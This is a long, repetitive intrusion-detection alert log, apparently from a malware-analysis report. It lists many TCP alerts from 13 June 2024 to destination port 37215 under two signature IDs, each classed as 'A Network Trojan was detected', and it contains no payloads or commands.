              Timestamp:06/13/24-21:32:03.307530
              SID:2835222
              Source Port:41292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508020
              SID:2829579
              Source Port:44866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611791
              SID:2829579
              Source Port:52804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508913
              SID:2835222
              Source Port:35266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.609409
              SID:2835222
              Source Port:34414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.215015
              SID:2829579
              Source Port:52830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.011931
              SID:2835222
              Source Port:57292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.154164
              SID:2829579
              Source Port:33326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.154620
              SID:2829579
              Source Port:38790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.299353
              SID:2835222
              Source Port:55966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.166995
              SID:2829579
              Source Port:40768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.294752
              SID:2835222
              Source Port:43296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508655
              SID:2835222
              Source Port:52314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.267569
              SID:2829579
              Source Port:60254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.969038
              SID:2835222
              Source Port:52716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152146
              SID:2829579
              Source Port:33022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.272793
              SID:2835222
              Source Port:48954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544831
              SID:2829579
              Source Port:51898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913936
              SID:2829579
              Source Port:45082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.177562
              SID:2835222
              Source Port:56244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610924
              SID:2829579
              Source Port:40968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.992916
              SID:2835222
              Source Port:43674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213056
              SID:2835222
              Source Port:46530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.476354
              SID:2829579
              Source Port:50728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508004
              SID:2829579
              Source Port:52982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485998
              SID:2835222
              Source Port:45156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.975002
              SID:2835222
              Source Port:36298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.156694
              SID:2835222
              Source Port:39800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.510104
              SID:2829579
              Source Port:55656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756960
              SID:2829579
              Source Port:33514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.195008
              SID:2829579
              Source Port:48684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786793
              SID:2835222
              Source Port:40278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656769
              SID:2835222
              Source Port:53454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.635144
              SID:2829579
              Source Port:58242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.888421
              SID:2829579
              Source Port:53812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.630254
              SID:2829579
              Source Port:40754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.304491
              SID:2835222
              Source Port:52004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176712
              SID:2835222
              Source Port:38628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610938
              SID:2835222
              Source Port:57470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.784100
              SID:2835222
              Source Port:33248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.269746
              SID:2835222
              Source Port:48782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301062
              SID:2835222
              Source Port:35362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.474023
              SID:2835222
              Source Port:36140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708184
              SID:2835222
              Source Port:40562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211355
              SID:2835222
              Source Port:51556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.527679
              SID:2829579
              Source Port:49936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.940520
              SID:2829579
              Source Port:59250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.476805
              SID:2829579
              Source Port:39652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.045061
              SID:2835222
              Source Port:35874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211475
              SID:2835222
              Source Port:56092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152605
              SID:2835222
              Source Port:42760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.417793
              SID:2835222
              Source Port:34370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078267
              SID:2829579
              Source Port:45078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509937
              SID:2829579
              Source Port:38980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089429
              SID:2829579
              Source Port:46294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.124137
              SID:2829579
              Source Port:44336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093697
              SID:2829579
              Source Port:45050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.037871
              SID:2835222
              Source Port:41314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942865
              SID:2829579
              Source Port:52542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885176
              SID:2835222
              Source Port:39106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730047
              SID:2829579
              Source Port:59254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197820
              SID:2829579
              Source Port:36920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.460077
              SID:2835222
              Source Port:40770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.125507
              SID:2835222
              Source Port:34924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309310
              SID:2835222
              Source Port:33774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707077
              SID:2829579
              Source Port:56134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.935166
              SID:2835222
              Source Port:34876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.378154
              SID:2829579
              Source Port:40058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785487
              SID:2835222
              Source Port:60338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212575
              SID:2829579
              Source Port:54358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.844039
              SID:2829579
              Source Port:36038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.680841
              SID:2829579
              Source Port:38554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.677542
              SID:2835222
              Source Port:40558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.215337
              SID:2829579
              Source Port:43366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.403689
              SID:2835222
              Source Port:51402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403824
              SID:2829579
              Source Port:60612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611164
              SID:2829579
              Source Port:34530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.831082
              SID:2829579
              Source Port:34856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154907
              SID:2835222
              Source Port:44718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.604740
              SID:2829579
              Source Port:58188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.154325
              SID:2829579
              Source Port:52760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417044
              SID:2829579
              Source Port:54344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458461
              SID:2835222
              Source Port:43224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.264622
              SID:2835222
              Source Port:41256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.130787
              SID:2829579
              Source Port:46402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159708
              SID:2835222
              Source Port:58592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.199301
              SID:2835222
              Source Port:41180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308428
              SID:2829579
              Source Port:53420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169501
              SID:2829579
              Source Port:42910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503104
              SID:2835222
              Source Port:57110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.802528
              SID:2835222
              Source Port:56340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.244520
              SID:2829579
              Source Port:47960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.274394
              SID:2835222
              Source Port:42474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.154064
              SID:2829579
              Source Port:55428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.973446
              SID:2835222
              Source Port:42598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502617
              SID:2829579
              Source Port:42276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824194
              SID:2829579
              Source Port:48246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.799433
              SID:2835222
              Source Port:39916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.136158
              SID:2835222
              Source Port:57160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.676745
              SID:2829579
              Source Port:52114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657068
              SID:2829579
              Source Port:38782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.884550
              SID:2829579
              Source Port:55544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302937
              SID:2829579
              Source Port:56218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.355389
              SID:2835222
              Source Port:53814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824520
              SID:2829579
              Source Port:52562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.504108
              SID:2835222
              Source Port:56992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.173854
              SID:2835222
              Source Port:35408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.057952
              SID:2829579
              Source Port:34930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.097113
              SID:2835222
              Source Port:35230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507869
              SID:2835222
              Source Port:36014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.151051
              SID:2835222
              Source Port:37564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.173795
              SID:2829579
              Source Port:52230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402083
              SID:2829579
              Source Port:52238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786089
              SID:2835222
              Source Port:38634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042161
              SID:2829579
              Source Port:42160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.125074
              SID:2829579
              Source Port:48004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.318491
              SID:2835222
              Source Port:36028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.174005
              SID:2829579
              Source Port:44692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942670
              SID:2829579
              Source Port:37932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.617424
              SID:2835222
              Source Port:50566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416186
              SID:2835222
              Source Port:41388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041698
              SID:2829579
              Source Port:42254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.258050
              SID:2829579
              Source Port:46088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416633
              SID:2835222
              Source Port:50106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754685
              SID:2829579
              Source Port:45688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.151964
              SID:2829579
              Source Port:54486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278237
              SID:2835222
              Source Port:59202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.751528
              SID:2835222
              Source Port:43690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821299
              SID:2835222
              Source Port:51852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.340836
              SID:2835222
              Source Port:42310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658070
              SID:2835222
              Source Port:42144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.567686
              SID:2829579
              Source Port:35752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726460
              SID:2829579
              Source Port:57254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.605202
              SID:2829579
              Source Port:45958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253173
              SID:2835222
              Source Port:38574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509093
              SID:2835222
              Source Port:34914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.420462
              SID:2835222
              Source Port:45640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.706883
              SID:2829579
              Source Port:42474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758696
              SID:2829579
              Source Port:45642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752631
              SID:2835222
              Source Port:44254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889186
              SID:2829579
              Source Port:59296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027140
              SID:2829579
              Source Port:59150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.151667
              SID:2829579
              Source Port:58628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.102012
              SID:2835222
              Source Port:58872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137506
              SID:2835222
              Source Port:60050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.784052
              SID:2829579
              Source Port:49398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041625
              SID:2835222
              Source Port:42018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277008
              SID:2835222
              Source Port:59446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.266959
              SID:2829579
              Source Port:49902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277043
              SID:2835222
              Source Port:52998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.151190
              SID:2829579
              Source Port:50348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153751
              SID:2829579
              Source Port:58290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.476664
              SID:2829579
              Source Port:59822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.294483
              SID:2829579
              Source Port:38572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214450
              SID:2829579
              Source Port:52526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942624
              SID:2829579
              Source Port:47938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509596
              SID:2835222
              Source Port:59802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092439
              SID:2835222
              Source Port:37550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040187
              SID:2835222
              Source Port:51470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078233
              SID:2829579
              Source Port:40826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.215554
              SID:2829579
              Source Port:58104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.804357
              SID:2829579
              Source Port:57790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109706
              SID:2829579
              Source Port:43136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349499
              SID:2829579
              Source Port:58690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547165
              SID:2835222
              Source Port:59472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.305756
              SID:2835222
              Source Port:33446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.272626
              SID:2829579
              Source Port:39448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.298581
              SID:2829579
              Source Port:52084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.840089
              SID:2829579
              Source Port:53716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.872162
              SID:2835222
              Source Port:46122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485000
              SID:2829579
              Source Port:59520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041316
              SID:2835222
              Source Port:55506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.246627
              SID:2829579
              Source Port:32778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694046
              SID:2829579
              Source Port:33476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154653
              SID:2835222
              Source Port:49634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.988702
              SID:2835222
              Source Port:57324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485888
              SID:2829579
              Source Port:59174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695945
              SID:2829579
              Source Port:44592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.779836
              SID:2829579
              Source Port:39740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991992
              SID:2829579
              Source Port:46764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.348313
              SID:2835222
              Source Port:39184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241642
              SID:2829579
              Source Port:42322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256181
              SID:2829579
              Source Port:43814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153814
              SID:2835222
              Source Port:39138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416805
              SID:2829579
              Source Port:40960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.782699
              SID:2829579
              Source Port:49306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612587
              SID:2829579
              Source Port:40176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991501
              SID:2829579
              Source Port:53480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357040
              SID:2835222
              Source Port:34682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.759091
              SID:2835222
              Source Port:48844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.274719
              SID:2835222
              Source Port:59982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.791460
              SID:2835222
              Source Port:49404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276779
              SID:2835222
              Source Port:33726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544062
              SID:2835222
              Source Port:40554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611086
              SID:2835222
              Source Port:60846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757801
              SID:2835222
              Source Port:35810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196114
              SID:2835222
              Source Port:60832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440590
